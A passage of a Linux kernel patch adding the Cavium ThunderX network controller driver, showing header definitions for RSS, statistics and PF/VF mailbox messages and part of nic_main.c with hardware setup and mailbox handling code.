for CQ timer thresh interrupts + * Calculated for SCLK of 700Mhz + * value written should be a 1/16th of what is expected + * + * 1 tick per 0.05usec = value of 2.2 + * This 10% would be covered in CQ timer thresh value + */ +#define NICPF_CLK_PER_INT_TICK 2 + +struct nicvf_cq_poll { + u8 cq_idx; /* Completion queue index */ + struct napi_struct napi; +}; + +#define NIC_RSSI_COUNT 4096 /* Total no of RSS indices */ +#define NIC_MAX_RSS_HASH_BITS 8 +#define NIC_MAX_RSS_IDR_TBL_SIZE (1 << NIC_MAX_RSS_HASH_BITS) +#define RSS_HASH_KEY_SIZE 5 /* 320 bit key */ + +struct nicvf_rss_info { + bool enable; +#define RSS_L2_EXTENDED_HASH_ENA BIT(0) +#define RSS_IP_HASH_ENA BIT(1) +#define RSS_TCP_HASH_ENA BIT(2) +#define RSS_TCP_SYN_DIS BIT(3) +#define RSS_UDP_HASH_ENA BIT(4) +#define RSS_L4_EXTENDED_HASH_ENA BIT(5) +#define RSS_ROCE_ENA BIT(6) +#define RSS_L3_BI_DIRECTION_ENA BIT(7) +#define RSS_L4_BI_DIRECTION_ENA BIT(8) + u64 cfg; + u8 hash_bits; + u16 rss_size; + u8 ind_tbl[NIC_MAX_RSS_IDR_TBL_SIZE]; + u64 key[RSS_HASH_KEY_SIZE]; +} ____cacheline_aligned_in_smp; + +enum rx_stats_reg_offset { + RX_OCTS = 0x0, + RX_UCAST = 0x1, + RX_BCAST = 0x2, + RX_MCAST = 0x3, + RX_RED = 0x4, + RX_RED_OCTS = 0x5, + RX_ORUN = 0x6, + RX_ORUN_OCTS = 0x7, + RX_FCS = 0x8, + RX_L2ERR = 0x9, + RX_DRP_BCAST = 0xa, + RX_DRP_MCAST = 0xb, + RX_DRP_L3BCAST = 0xc, + RX_DRP_L3MCAST = 0xd, + RX_STATS_ENUM_LAST, +}; + +enum tx_stats_reg_offset { + TX_OCTS = 0x0, + TX_UCAST = 0x1, + TX_BCAST = 0x2, + TX_MCAST = 0x3, + TX_DROP = 0x4, + TX_STATS_ENUM_LAST, +}; + +struct nicvf_hw_stats { + u64 rx_bytes_ok; + u64 rx_ucast_frames_ok; + u64 rx_bcast_frames_ok; + u64 rx_mcast_frames_ok; + u64 rx_fcs_errors; + u64 rx_l2_errors; + u64 rx_drop_red; + u64 rx_drop_red_bytes; + u64 rx_drop_overrun; + u64 rx_drop_overrun_bytes; + u64 rx_drop_bcast; + u64 rx_drop_mcast; + u64 rx_drop_l3_bcast; + u64 rx_drop_l3_mcast; + u64 tx_bytes_ok; + u64 tx_ucast_frames_ok; + u64 tx_bcast_frames_ok; + u64 tx_mcast_frames_ok; + u64 tx_drops; +}; + +struct nicvf_drv_stats { + /* Rx */ + u64 rx_frames_ok; + u64 rx_frames_64; + u64 rx_frames_127; + u64 rx_frames_255; + u64 rx_frames_511; + u64 rx_frames_1023; + u64 rx_frames_1518; + u64 rx_frames_jumbo; + u64 rx_drops; + /* Tx */ + u64 tx_frames_ok; + u64 tx_drops; + u64 tx_busy; + u64 tx_tso; +}; + +struct nicvf { + struct net_device *netdev; + struct pci_dev *pdev; + u8 vf_id; + u8 node; + u8 tns_mode; + u16 mtu; + struct queue_set *qs; + void __iomem *reg_base; + bool link_up; + u8 duplex; + u32 speed; + struct page *rb_page; + u32 rb_page_offset; + bool rb_alloc_fail; + bool rb_work_scheduled; + struct delayed_work rbdr_work; + struct tasklet_struct rbdr_task; + struct tasklet_struct qs_err_task; + struct tasklet_struct cq_task; + struct nicvf_cq_poll *napi[8]; + struct nicvf_rss_info rss_info; + u8 cpi_alg; + /* Interrupt coalescing settings */ + u32 cq_coalesce_usecs; + + u32 msg_enable; + struct nicvf_hw_stats stats; + struct nicvf_drv_stats drv_stats; + struct bgx_stats bgx_stats; + struct work_struct reset_task; + + /* MSI-X */ + bool msix_enabled; + u8 num_vec; + struct msix_entry msix_entries[NIC_VF_MSIX_VECTORS]; + char irq_name[NIC_VF_MSIX_VECTORS][20]; + bool irq_allocated[NIC_VF_MSIX_VECTORS]; + + bool pf_ready_to_rcv_msg; + bool pf_acked; + bool pf_nacked; + bool bgx_stats_acked; +} ____cacheline_aligned_in_smp; + +/* PF <--> VF Mailbox communication + * Eight 64bit registers are shared between PF and VF. + * Separate set for each VF. + * Writing '1' into last register mbx7 means end of message. 
+ */ + +/* PF <--> VF mailbox communication */ +#define NIC_PF_VF_MAILBOX_SIZE 2 +#define NIC_MBOX_MSG_TIMEOUT 2000 /* ms */ + +/* Mailbox message types */ +#define NIC_MBOX_MSG_READY 0x01 /* Is PF ready to rcv msgs */ +#define NIC_MBOX_MSG_ACK 0x02 /* ACK the message received */ +#define NIC_MBOX_MSG_NACK 0x03 /* NACK the message received */ +#define NIC_MBOX_MSG_QS_CFG 0x04 /* Configure Qset */ +#define NIC_MBOX_MSG_RQ_CFG 0x05 /* Configure receive queue */ +#define NIC_MBOX_MSG_SQ_CFG 0x06 /* Configure Send queue */ +#define NIC_MBOX_MSG_RQ_DROP_CFG 0x07 /* Configure receive queue */ +#define NIC_MBOX_MSG_SET_MAC 0x08 /* Add MAC ID to DMAC filter */ +#define NIC_MBOX_MSG_SET_MAX_FRS 0x09 /* Set max frame size */ +#define NIC_MBOX_MSG_CPI_CFG 0x0A /* Config CPI, RSSI */ +#define NIC_MBOX_MSG_RSS_SIZE 0x0B /* Get RSS indir_tbl size */ +#define NIC_MBOX_MSG_RSS_CFG 0x0C /* Config RSS table */ +#define NIC_MBOX_MSG_RSS_CFG_CONT 0x0D /* RSS config continuation */ +#define NIC_MBOX_MSG_RQ_BP_CFG 0x0E /* RQ backpressure config */ +#define NIC_MBOX_MSG_RQ_SW_SYNC 0x0F /* Flush inflight pkts to RQ */ +#define NIC_MBOX_MSG_BGX_STATS 0x10 /* Get stats from BGX */ +#define NIC_MBOX_MSG_BGX_LINK_CHANGE 0x11 /* BGX:LMAC link status */ +#define NIC_MBOX_MSG_CFG_DONE 0x12 /* VF configuration done */ +#define NIC_MBOX_MSG_SHUTDOWN 0x13 /* VF is being shutdown */ + +struct nic_cfg_msg { + u8 msg; + u8 vf_id; + u8 tns_mode; + u8 node_id; + u64 mac_addr; +}; + +/* Qset configuration */ +struct qs_cfg_msg { + u8 msg; + u8 num; + u64 cfg; +}; + +/* Receive queue configuration */ +struct rq_cfg_msg { + u8 msg; + u8 qs_num; + u8 rq_num; + u64 cfg; +}; + +/* Send queue configuration */ +struct sq_cfg_msg { + u8 msg; + u8 qs_num; + u8 sq_num; + u64 cfg; +}; + +/* Set VF's MAC address */ +struct set_mac_msg { + u8 msg; + u8 vf_id; + u64 addr; +}; + +/* Set Maximum frame size */ +struct set_frs_msg { + u8 msg; + u8 vf_id; + u16 max_frs; +}; + +/* Set CPI algorithm type */ +struct cpi_cfg_msg { + u8 msg; + u8 vf_id; + u8 rq_cnt; + u8 cpi_alg; +}; + +/* Get RSS table size */ +struct rss_sz_msg { + u8 msg; + u8 vf_id; + u16 ind_tbl_size; +}; + +/* Set RSS configuration */ +struct rss_cfg_msg { + u8 msg; + u8 vf_id; + u8 hash_bits; + u8 tbl_len; + u8 tbl_offset; +#define RSS_IND_TBL_LEN_PER_MBX_MSG 8 + u8 ind_tbl[RSS_IND_TBL_LEN_PER_MBX_MSG]; +}; + +struct bgx_stats_msg { + u8 msg; + u8 vf_id; + u8 rx; + u8 idx; + u64 stats; +}; + +/* Physical interface link status */ +struct bgx_link_status { + u8 msg; + u8 link_up; + u8 duplex; + u32 speed; +}; + +/* 128 bit shared memory between PF and each VF */ +union nic_mbx { + struct { u8 msg; } msg; + struct nic_cfg_msg nic_cfg; + struct qs_cfg_msg qs; + struct rq_cfg_msg rq; + struct sq_cfg_msg sq; + struct set_mac_msg mac; + struct set_frs_msg frs; + struct cpi_cfg_msg cpi_cfg; + struct rss_sz_msg rss_size; + struct rss_cfg_msg rss_cfg; + struct bgx_stats_msg bgx_stats; + struct bgx_link_status link_status; +}; + +int nicvf_set_real_num_queues(struct net_device *netdev, + int tx_queues, int rx_queues); +int nicvf_open(struct net_device *netdev); +int nicvf_stop(struct net_device *netdev); +int nicvf_send_msg_to_pf(struct nicvf *vf, union nic_mbx *mbx); +void nicvf_config_cpi(struct nicvf *nic); +void nicvf_config_rss(struct nicvf *nic); +void nicvf_set_rss_key(struct nicvf *nic); +void nicvf_free_skb(struct nicvf *nic, struct sk_buff *skb); +void nicvf_set_ethtool_ops(struct net_device *netdev); +void nicvf_update_stats(struct nicvf *nic); +void 
nicvf_update_lmac_stats(struct nicvf *nic); + +#endif /* NIC_H */ diff --git a/drivers/net/ethernet/cavium/thunder/nic_main.c b/drivers/net/ethernet/cavium/thunder/nic_main.c new file mode 100644 index 000000000000..0f1f58b54bf1 --- /dev/null +++ b/drivers/net/ethernet/cavium/thunder/nic_main.c @@ -0,0 +1,940 @@ +/* + * Copyright (C) 2015 Cavium, Inc. + * + * This program is free software; you can redistribute it and/or modify it + * under the terms of version 2 of the GNU General Public License + * as published by the Free Software Foundation. + */ + +#include +#include +#include +#include +#include + +#include "nic_reg.h" +#include "nic.h" +#include "q_struct.h" +#include "thunder_bgx.h" + +#define DRV_NAME "thunder-nic" +#define DRV_VERSION "1.0" + +struct nicpf { + struct pci_dev *pdev; + u8 rev_id; +#define NIC_NODE_ID_MASK 0x300000000000 +#define NIC_NODE_ID(x) ((x & NODE_ID_MASK) >> 44) + u8 node; + unsigned int flags; + u8 num_vf_en; /* No of VF enabled */ + bool vf_enabled[MAX_NUM_VFS_SUPPORTED]; + void __iomem *reg_base; /* Register start address */ + struct pkind_cfg pkind; +#define NIC_SET_VF_LMAC_MAP(bgx, lmac) (((bgx & 0xF) << 4) | (lmac & 0xF)) +#define NIC_GET_BGX_FROM_VF_LMAC_MAP(map) ((map >> 4) & 0xF) +#define NIC_GET_LMAC_FROM_VF_LMAC_MAP(map) (map & 0xF) + u8 vf_lmac_map[MAX_LMAC]; + struct delayed_work dwork; + struct workqueue_struct *check_link; + u8 link[MAX_LMAC]; + u8 duplex[MAX_LMAC]; + u32 speed[MAX_LMAC]; + u16 cpi_base[MAX_NUM_VFS_SUPPORTED]; + u16 rss_ind_tbl_size; + bool mbx_lock[MAX_NUM_VFS_SUPPORTED]; + + /* MSI-X */ + bool msix_enabled; + u8 num_vec; + struct msix_entry msix_entries[NIC_PF_MSIX_VECTORS]; + bool irq_allocated[NIC_PF_MSIX_VECTORS]; +}; + +/* Supported devices */ +static const struct pci_device_id nic_id_table[] = { + { PCI_DEVICE(PCI_VENDOR_ID_CAVIUM, PCI_DEVICE_ID_THUNDER_NIC_PF) }, + { 0, } /* end of table */ +}; + +MODULE_AUTHOR("Sunil Goutham"); +MODULE_DESCRIPTION("Cavium Thunder NIC Physical Function Driver"); +MODULE_LICENSE("GPL v2"); +MODULE_VERSION(DRV_VERSION); +MODULE_DEVICE_TABLE(pci, nic_id_table); + +/* The Cavium ThunderX network controller can *only* be found in SoCs + * containing the ThunderX ARM64 CPU implementation. All accesses to the device + * registers on this platform are implicitly strongly ordered with respect + * to memory accesses. So writeq_relaxed() and readq_relaxed() are safe to use + * with no memory barriers in this driver. The readq()/writeq() functions add + * explicit ordering operation which in this case are redundant, and only + * add overhead. 
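[Editorial note, not part of the patch] One detail worth calling out in struct nicpf above: NIC_NODE_ID() is spelled in terms of NODE_ID_MASK while the constant actually defined is NIC_NODE_ID_MASK; the two presumably refer to the same 0x300000000000 mask. The sketch below (hypothetical helper name, illustrative only) is the computation nic_probe() performs later in this file to pick the SoC node from the physical address of the PF's configuration BAR, where that mask covers address bits 45:44.

        /* Illustrative sketch: node number derived from BAR0's physical
         * address, equivalent to NIC_NODE_ID(pci_resource_start(...)).
         */
        static inline u8 example_nic_node(u64 bar0_start)
        {
                return (u8)((bar0_start & 0x300000000000ULL) >> 44);
        }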
+ */ + +/* Register read/write APIs */ +static void nic_reg_write(struct nicpf *nic, u64 offset, u64 val) +{ + writeq_relaxed(val, nic->reg_base + offset); +} + +static u64 nic_reg_read(struct nicpf *nic, u64 offset) +{ + return readq_relaxed(nic->reg_base + offset); +} + +/* PF -> VF mailbox communication APIs */ +static void nic_enable_mbx_intr(struct nicpf *nic) +{ + /* Enable mailbox interrupt for all 128 VFs */ + nic_reg_write(nic, NIC_PF_MAILBOX_ENA_W1S, ~0ull); + nic_reg_write(nic, NIC_PF_MAILBOX_ENA_W1S + sizeof(u64), ~0ull); +} + +static void nic_clear_mbx_intr(struct nicpf *nic, int vf, int mbx_reg) +{ + nic_reg_write(nic, NIC_PF_MAILBOX_INT + (mbx_reg << 3), BIT_ULL(vf)); +} + +static u64 nic_get_mbx_addr(int vf) +{ + return NIC_PF_VF_0_127_MAILBOX_0_1 + (vf << NIC_VF_NUM_SHIFT); +} + +/* Send a mailbox message to VF + * @vf: vf to which this message to be sent + * @mbx: Message to be sent + */ +static void nic_send_msg_to_vf(struct nicpf *nic, int vf, union nic_mbx *mbx) +{ + void __iomem *mbx_addr = nic->reg_base + nic_get_mbx_addr(vf); + u64 *msg = (u64 *)mbx; + + /* In first revision HW, mbox interrupt is triggerred + * when PF writes to MBOX(1), in next revisions when + * PF writes to MBOX(0) + */ + if (nic->rev_id == 0) { + /* see the comment for nic_reg_write()/nic_reg_read() + * functions above + */ + writeq_relaxed(msg[0], mbx_addr); + writeq_relaxed(msg[1], mbx_addr + 8); + } else { + writeq_relaxed(msg[1], mbx_addr + 8); + writeq_relaxed(msg[0], mbx_addr); + } +} + +/* Responds to VF's READY message with VF's + * ID, node, MAC address e.t.c + * @vf: VF which sent READY message + */ +static void nic_mbx_send_ready(struct nicpf *nic, int vf) +{ + union nic_mbx mbx = {}; + int bgx_idx, lmac; + const char *mac; + + mbx.nic_cfg.msg = NIC_MBOX_MSG_READY; + mbx.nic_cfg.vf_id = vf; + + mbx.nic_cfg.tns_mode = NIC_TNS_BYPASS_MODE; + + bgx_idx = NIC_GET_BGX_FROM_VF_LMAC_MAP(nic->vf_lmac_map[vf]); + lmac = NIC_GET_LMAC_FROM_VF_LMAC_MAP(nic->vf_lmac_map[vf]); + + mac = bgx_get_lmac_mac(nic->node, bgx_idx, lmac); + if (mac) + ether_addr_copy((u8 *)&mbx.nic_cfg.mac_addr, mac); + + mbx.nic_cfg.node_id = nic->node; + nic_send_msg_to_vf(nic, vf, &mbx); +} + +/* ACKs VF's mailbox message + * @vf: VF to which ACK to be sent + */ +static void nic_mbx_send_ack(struct nicpf *nic, int vf) +{ + union nic_mbx mbx = {}; + + mbx.msg.msg = NIC_MBOX_MSG_ACK; + nic_send_msg_to_vf(nic, vf, &mbx); +} + +/* NACKs VF's mailbox message that PF is not able to + * complete the action + * @vf: VF to which ACK to be sent + */ +static void nic_mbx_send_nack(struct nicpf *nic, int vf) +{ + union nic_mbx mbx = {}; + + mbx.msg.msg = NIC_MBOX_MSG_NACK; + nic_send_msg_to_vf(nic, vf, &mbx); +} + +/* Flush all in flight receive packets to memory and + * bring down an active RQ + */ +static int nic_rcv_queue_sw_sync(struct nicpf *nic) +{ + u16 timeout = ~0x00; + + nic_reg_write(nic, NIC_PF_SW_SYNC_RX, 0x01); + /* Wait till sync cycle is finished */ + while (timeout) { + if (nic_reg_read(nic, NIC_PF_SW_SYNC_RX_DONE) & 0x1) + break; + timeout--; + } + nic_reg_write(nic, NIC_PF_SW_SYNC_RX, 0x00); + if (!timeout) { + dev_err(&nic->pdev->dev, "Receive queue software sync failed"); + return 1; + } + return 0; +} + +/* Get BGX Rx/Tx stats and respond to VF's request */ +static void nic_get_bgx_stats(struct nicpf *nic, struct bgx_stats_msg *bgx) +{ + int bgx_idx, lmac; + union nic_mbx mbx = {}; + + bgx_idx = NIC_GET_BGX_FROM_VF_LMAC_MAP(nic->vf_lmac_map[bgx->vf_id]); + lmac = 
NIC_GET_LMAC_FROM_VF_LMAC_MAP(nic->vf_lmac_map[bgx->vf_id]); + + mbx.bgx_stats.msg = NIC_MBOX_MSG_BGX_STATS; + mbx.bgx_stats.vf_id = bgx->vf_id; + mbx.bgx_stats.rx = bgx->rx; + mbx.bgx_stats.idx = bgx->idx; + if (bgx->rx) + mbx.bgx_stats.stats = bgx_get_rx_stats(nic->node, bgx_idx, + lmac, bgx->idx); + else + mbx.bgx_stats.stats = bgx_get_tx_stats(nic->node, bgx_idx, + lmac, bgx->idx); + nic_send_msg_to_vf(nic, bgx->vf_id, &mbx); +} + +/* Update hardware min/max frame size */ +static int nic_update_hw_frs(struct nicpf *nic, int new_frs, int vf) +{ + if ((new_frs > NIC_HW_MAX_FRS) || (new_frs < NIC_HW_MIN_FRS)) { + dev_err(&nic->pdev->dev, + "Invalid MTU setting from VF%d rejected, should be between %d and %d\n", + vf, NIC_HW_MIN_FRS, NIC_HW_MAX_FRS); + return 1; + } + new_frs += ETH_HLEN; + if (new_frs <= nic->pkind.maxlen) + return 0; + + nic->pkind.maxlen = new_frs; + nic_reg_write(nic, NIC_PF_PKIND_0_15_CFG, *(u64 *)&nic->pkind); + return 0; +} + +/* Set minimum transmit packet size */ +static void nic_set_tx_pkt_pad(struct nicpf *nic, int size) +{ + int lmac; + u64 lmac_cfg; + + /* Max value that can be set is 60 */ + if (size > 60) + size = 60; + + for (lmac = 0; lmac < (MAX_BGX_PER_CN88XX * MAX_LMAC_PER_BGX); lmac++) { + lmac_cfg = nic_reg_read(nic, NIC_PF_LMAC_0_7_CFG | (lmac << 3)); + lmac_cfg &= ~(0xF << 2); + lmac_cfg |= ((size / 4) << 2); + nic_reg_write(nic, NIC_PF_LMAC_0_7_CFG | (lmac << 3), lmac_cfg); + } +} + +/* Function to check number of LMACs present and set VF::LMAC mapping. + * Mapping will be used while initializing channels. + */ +static void nic_set_lmac_vf_mapping(struct nicpf *nic) +{ + unsigned bgx_map = bgx_get_map(nic->node); + int bgx, next_bgx_lmac = 0; + int lmac, lmac_cnt = 0; + u64 lmac_credit; + + nic->num_vf_en = 0; + + for (bgx = 0; bgx < NIC_MAX_BGX; bgx++) { + if (!(bgx_map & (1 << bgx))) + continue; + lmac_cnt = bgx_get_lmac_count(nic->node, bgx); + for (lmac = 0; lmac < lmac_cnt; lmac++) + nic->vf_lmac_map[next_bgx_lmac++] = + NIC_SET_VF_LMAC_MAP(bgx, lmac); + nic->num_vf_en += lmac_cnt; + + /* Program LMAC credits */ + lmac_credit = (1ull << 1); /* channel credit enable */ + lmac_credit |= (0x1ff << 2); /* Max outstanding pkt count */ + /* 48KB BGX Tx buffer size, each unit is of size 16bytes */ + lmac_credit |= (((((48 * 1024) / lmac_cnt) - + NIC_HW_MAX_FRS) / 16) << 12); + lmac = bgx * MAX_LMAC_PER_BGX; + for (; lmac < lmac_cnt + (bgx * MAX_LMAC_PER_BGX); lmac++) + nic_reg_write(nic, + NIC_PF_LMAC_0_7_CREDIT + (lmac * 8), + lmac_credit); + } +} + +#define BGX0_BLOCK 8 +#define BGX1_BLOCK 9 + +static void nic_init_hw(struct nicpf *nic) +{ + int i; + + /* Reset NIC, in case the driver is repeatedly inserted and removed */ + nic_reg_write(nic, NIC_PF_SOFT_RESET, 1); + + /* Enable NIC HW block */ + nic_reg_write(nic, NIC_PF_CFG, 0x3); + + /* Enable backpressure */ + nic_reg_write(nic, NIC_PF_BP_CFG, (1ULL << 6) | 0x03); + + /* Disable TNS mode on both interfaces */ + nic_reg_write(nic, NIC_PF_INTF_0_1_SEND_CFG, + (NIC_TNS_BYPASS_MODE << 7) | BGX0_BLOCK); + nic_reg_write(nic, NIC_PF_INTF_0_1_SEND_CFG | (1 << 8), + (NIC_TNS_BYPASS_MODE << 7) | BGX1_BLOCK); + nic_reg_write(nic, NIC_PF_INTF_0_1_BP_CFG, + (1ULL << 63) | BGX0_BLOCK); + nic_reg_write(nic, NIC_PF_INTF_0_1_BP_CFG + (1 << 8), + (1ULL << 63) | BGX1_BLOCK); + + /* PKIND configuration */ + nic->pkind.minlen = 0; + nic->pkind.maxlen = NIC_HW_MAX_FRS + ETH_HLEN; + nic->pkind.lenerr_en = 1; + nic->pkind.rx_hdr = 0; + nic->pkind.hdr_sl = 0; + + for (i = 0; i < NIC_MAX_PKIND; i++) + nic_reg_write(nic, 
NIC_PF_PKIND_0_15_CFG | (i << 3), + *(u64 *)&nic->pkind); + + nic_set_tx_pkt_pad(nic, NIC_HW_MIN_FRS); + + /* Timer config */ + nic_reg_write(nic, NIC_PF_INTR_TIMER_CFG, NICPF_CLK_PER_INT_TICK); +} + +/* Channel parse index configuration */ +static void nic_config_cpi(struct nicpf *nic, struct cpi_cfg_msg *cfg) +{ + u32 vnic, bgx, lmac, chan; + u32 padd, cpi_count = 0; + u64 cpi_base, cpi, rssi_base, rssi; + u8 qset, rq_idx = 0; + + vnic = cfg->vf_id; + bgx = NIC_GET_BGX_FROM_VF_LMAC_MAP(nic->vf_lmac_map[vnic]); + lmac = NIC_GET_LMAC_FROM_VF_LMAC_MAP(nic->vf_lmac_map[vnic]); + + chan = (lmac * MAX_BGX_CHANS_PER_LMAC) + (bgx * NIC_CHANS_PER_INF); + cpi_base = (lmac * NIC_MAX_CPI_PER_LMAC) + (bgx * NIC_CPI_PER_BGX); + rssi_base = (lmac * nic->rss_ind_tbl_size) + (bgx * NIC_RSSI_PER_BGX); + + /* Rx channel configuration */ + nic_reg_write(nic, NIC_PF_CHAN_0_255_RX_BP_CFG | (chan << 3), + (1ull << 63) | (vnic << 0)); + nic_reg_write(nic, NIC_PF_CHAN_0_255_RX_CFG | (chan << 3), + ((u64)cfg->cpi_alg << 62) | (cpi_base << 48)); + + if (cfg->cpi_alg == CPI_ALG_NONE) + cpi_count = 1; + else if (cfg->cpi_alg == CPI_ALG_VLAN) /* 3 bits of PCP */ + cpi_count = 8; + else if (cfg->cpi_alg == CPI_ALG_VLAN16) /* 3 bits PCP + DEI */ + cpi_count = 16; + else if (cfg->cpi_alg == CPI_ALG_DIFF) /* 6bits DSCP */ + cpi_count = NIC_MAX_CPI_PER_LMAC; + + /* RSS Qset, Qidx mapping */ + qset = cfg->vf_id; + rssi = rssi_base; + for (; rssi < (rssi_base + cfg->rq_cnt); rssi++) { + nic_reg_write(nic, NIC_PF_RSSI_0_4097_RQ | (rssi << 3), + (qset << 3) | rq_idx); + rq_idx++; + } + + rssi = 0; + cpi = cpi_base; + for (; cpi < (cpi_base + cpi_count); cpi++) { + /* Determine port to channel adder */ + if (cfg->cpi_alg != CPI_ALG_DIFF) + padd = cpi % cpi_count; + else + padd = cpi % 8; /* 3 bits CS out of 6bits DSCP */ + + /* Leave RSS_SIZE as '0' to disable RSS */ + nic_reg_write(nic, NIC_PF_CPI_0_2047_CFG | (cpi << 3), + (vnic << 24) | (padd << 16) | (rssi_base + rssi)); + + if ((rssi + 1) >= cfg->rq_cnt) + continue; + + if (cfg->cpi_alg == CPI_ALG_VLAN) + rssi++; + else if (cfg->cpi_alg == CPI_ALG_VLAN16) + rssi = ((cpi - cpi_base) & 0xe) >> 1; + else if (cfg->cpi_alg == CPI_ALG_DIFF) + rssi = ((cpi - cpi_base) & 0x38) >> 3; + } + nic->cpi_base[cfg->vf_id] = cpi_base; +} + +/* Responsds to VF with its RSS indirection table size */ +static void nic_send_rss_size(struct nicpf *nic, int vf) +{ + union nic_mbx mbx = {}; + u64 *msg; + + msg = (u64 *)&mbx; + + mbx.rss_size.msg = NIC_MBOX_MSG_RSS_SIZE; + mbx.rss_size.ind_tbl_size = nic->rss_ind_tbl_size; + nic_send_msg_to_vf(nic, vf, &mbx); +} + +/* Receive side scaling configuration + * configure: + * - RSS index + * - indir table i.e hash::RQ mapping + * - no of hash bits to consider + */ +static void nic_config_rss(struct nicpf *nic, struct rss_cfg_msg *cfg) +{ + u8 qset, idx = 0; + u64 cpi_cfg, cpi_base, rssi_base, rssi; + + cpi_base = nic->cpi_base[cfg->vf_id]; + cpi_cfg = nic_reg_read(nic, NIC_PF_CPI_0_2047_CFG | (cpi_base << 3)); + rssi_base = (cpi_cfg & 0x0FFF) + cfg->tbl_offset; + + rssi = rssi_base; + qset = cfg->vf_id; + + for (; rssi < (rssi_base + cfg->tbl_len); rssi++) { + nic_reg_write(nic, NIC_PF_RSSI_0_4097_RQ | (rssi << 3), + (qset << 3) | (cfg->ind_tbl[idx] & 0x7)); + idx++; + } + + cpi_cfg &= ~(0xFULL << 20); + cpi_cfg |= (cfg->hash_bits << 20); + nic_reg_write(nic, NIC_PF_CPI_0_2047_CFG | (cpi_base << 3), cpi_cfg); +} + +/* 4 level transmit side scheduler configutation + * for TNS bypass mode + * + * Sample configuration for SQ0 + * VNIC0-SQ0 -> TL4(0) -> 
TL3[0] -> TL2[0] -> TL1[0] -> BGX0 + * VNIC1-SQ0 -> TL4(8) -> TL3[2] -> TL2[0] -> TL1[0] -> BGX0 + * VNIC2-SQ0 -> TL4(16) -> TL3[4] -> TL2[1] -> TL1[0] -> BGX0 + * VNIC3-SQ0 -> TL4(24) -> TL3[6] -> TL2[1] -> TL1[0] -> BGX0 + * VNIC4-SQ0 -> TL4(512) -> TL3[128] -> TL2[32] -> TL1[1] -> BGX1 + * VNIC5-SQ0 -> TL4(520) -> TL3[130] -> TL2[32] -> TL1[1] -> BGX1 + * VNIC6-SQ0 -> TL4(528) -> TL3[132] -> TL2[33] -> TL1[1] -> BGX1 + * VNIC7-SQ0 -> TL4(536) -> TL3[134] -> TL2[33] -> TL1[1] -> BGX1 + */ +static void nic_tx_channel_cfg(struct nicpf *nic, u8 vnic, u8 sq_idx) +{ + u32 bgx, lmac, chan; + u32 tl2, tl3, tl4; + u32 rr_quantum; + + bgx = NIC_GET_BGX_FROM_VF_LMAC_MAP(nic->vf_lmac_map[vnic]); + lmac = NIC_GET_LMAC_FROM_VF_LMAC_MAP(nic->vf_lmac_map[vnic]); + /* 24 bytes for FCS, IPG and preamble */ + rr_quantum = ((NIC_HW_MAX_FRS + 24) / 4); + + tl4 = (lmac * NIC_TL4_PER_LMAC) + (bgx * NIC_TL4_PER_BGX); + tl4 += sq_idx; + tl3 = tl4 / (NIC_MAX_TL4 / NIC_MAX_TL3); + nic_reg_write(nic, NIC_PF_QSET_0_127_SQ_0_7_CFG2 | + ((u64)vnic << NIC_QS_ID_SHIFT) | + ((u32)sq_idx << NIC_Q_NUM_SHIFT), tl4); + nic_reg_write(nic, NIC_PF_TL4_0_1023_CFG | (tl4 << 3), + ((u64)vnic << 27) | ((u32)sq_idx << 24) | rr_quantum); + + nic_reg_write(nic, NIC_PF_TL3_0_255_CFG | (tl3 << 3), rr_quantum); + chan = (lmac * MAX_BGX_CHANS_PER_LMAC) + (bgx * NIC_CHANS_PER_INF); + nic_reg_write(nic, NIC_PF_TL3_0_255_CHAN | (tl3 << 3), chan); + /* Enable backpressure on the channel */ + nic_reg_write(nic, NIC_PF_CHAN_0_255_TX_CFG | (chan << 3), 1); + + tl2 = tl3 >> 2; + nic_reg_write(nic, NIC_PF_TL3A_0_63_CFG | (tl2 << 3), tl2); + nic_reg_write(nic, NIC_PF_TL2_0_63_CFG | (tl2 << 3), rr_quantum); + /* No priorities as of now */ + nic_reg_write(nic, NIC_PF_TL2_0_63_PRI | (tl2 << 3), 0x00); +} + +/* Interrupt handler to handle mailbox messages from VFs */ +static void nic_handle_mbx_intr(struct nicpf *nic, int vf) +{ + union nic_mbx mbx = {}; + u64 *mbx_data; + u64 mbx_addr; + u64 reg_addr; + u64 mac_addr; + int bgx, lmac; + int i; + int ret = 0; + + nic->mbx_lock[vf] = true; + + mbx_addr = nic_get_mbx_addr(vf); + mbx_data = (u64 *)&mbx; + + for (i = 0; i < NIC_PF_VF_MAILBOX_SIZE; i++) { + *mbx_data = nic_reg_read(nic, mbx_addr); + mbx_data++; + mbx_addr += sizeof(u64); + } + + dev_dbg(&nic->pdev->dev, "%s: Mailbox msg %d from VF%d\n", + __func__, mbx.msg.msg, vf); + switch (mbx.msg.msg) { + case NIC_MBOX_MSG_READY: + nic_mbx_send_ready(nic, vf); + nic->link[vf] = 0; + nic->duplex[vf] = 0; + nic->speed[vf] = 0; + ret = 1; + break; + case NIC_MBOX_MSG_QS_CFG: + reg_addr = NIC_PF_QSET_0_127_CFG | + (mbx.qs.num << NIC_QS_ID_SHIFT); + nic_reg_write(nic, reg_addr, mbx.qs.cfg); + break; + case NIC_MBOX_MSG_RQ_CFG: + reg_addr = NIC_PF_QSET_0_127_RQ_0_7_CFG | + (mbx.rq.qs_num << NIC_QS_ID_SHIFT) | + (mbx.rq.rq_num << NIC_Q_NUM_SHIFT); + nic_reg_write(nic, reg_addr, mbx.rq.cfg); + break; + case NIC_MBOX_MSG_RQ_BP_CFG: + reg_addr = NIC_PF_QSET_0_127_RQ_0_7_BP_CFG | + (mbx.rq.qs_num << NIC_QS_ID_SHIFT) | + (mbx.rq.rq_num << NIC_Q_NUM_SHIFT); + nic_reg_write(nic, reg_addr, mbx.rq.cfg); + break; + case NIC_MBOX_MSG_RQ_SW_SYNC: + ret = nic_rcv_queue_sw_sync(nic); + break; + case NIC_MBOX_MSG_RQ_DROP_CFG: + reg_addr = NIC_PF_QSET_0_127_RQ_0_7_DROP_CFG | + (mbx.rq.qs_num << NIC_QS_ID_SHIFT) | + (mbx.rq.rq_num << NIC_Q_NUM_SHIFT); + nic_reg_write(nic, reg_addr, mbx.rq.cfg); + break; + case NIC_MBOX_MSG_SQ_CFG: + reg_addr = NIC_PF_QSET_0_127_SQ_0_7_CFG | + (mbx.sq.qs_num << NIC_QS_ID_SHIFT) | + (mbx.sq.sq_num << NIC_Q_NUM_SHIFT); + nic_reg_write(nic, 
